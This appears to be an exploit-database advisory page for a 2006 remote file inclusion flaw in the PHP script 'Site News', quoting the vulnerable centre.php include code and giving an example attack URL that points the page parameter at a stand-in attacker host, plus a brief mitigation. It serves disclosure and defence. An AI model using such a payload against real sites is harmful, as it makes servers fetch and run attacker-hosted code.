header-logo
Suggest Exploit
vendor:
Site News
by:
DaDIsS
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: Site News
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Site News => (centre.php) $page Remote File Inclusion Exploit

The flaw resides in centre.php file that contain this code: if (empty($page)) { include('accueil.php'); } else { include($page.'.php'); }. An example of the exploit is http://www.victime.com/(path)/centre.php?page=http://attacker

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file inclusion operation.
Source

Exploit-DB raw data:

#===================================================================================#
#
# Site News => (centre.php) $page Remote File Inclusion Exploit
#
#===================================================================================#
#
# Softname : Site News
# Url : http://dvmet.free.fr/script/site_news.zip
# Exploit type : Remote File Inclusion.
# Critical: Dangerous.
# Solution Status: Unpatched.
#
#===================================================================================#
#
# By DaDIsS - Member of the Moroccan Hackers Team
#
#===================================================================================#
#
# Exploit Explanation : 
#
#
# The flaw resides in centre.php file that contain this code :
# 
# <?
#
#   if (empty($page))
#    {
#         include("accueil.php");
#    }
#      else
#    {
#        include($page.".php");
#    }
#
# ?>
#
#===================================================================================#
#
# Example : 
#
#
# http://www.victime.com/(path)/centre.php?page=http://attacker
#
#
#================================================================#
#
# Greetz : YouYouCool, Hacker1, and all Moroccan Hackers Team, viva Morocco guyz !!
#
#===================================================================================#
#
# DaDIsS / dadiss@virtuaplanet.net
# Proud to be a Moroccan !
#
#===================================================================================#

# milw0rm.com [2006-11-23]

Navigation

Suggest Exploit

Services By CQR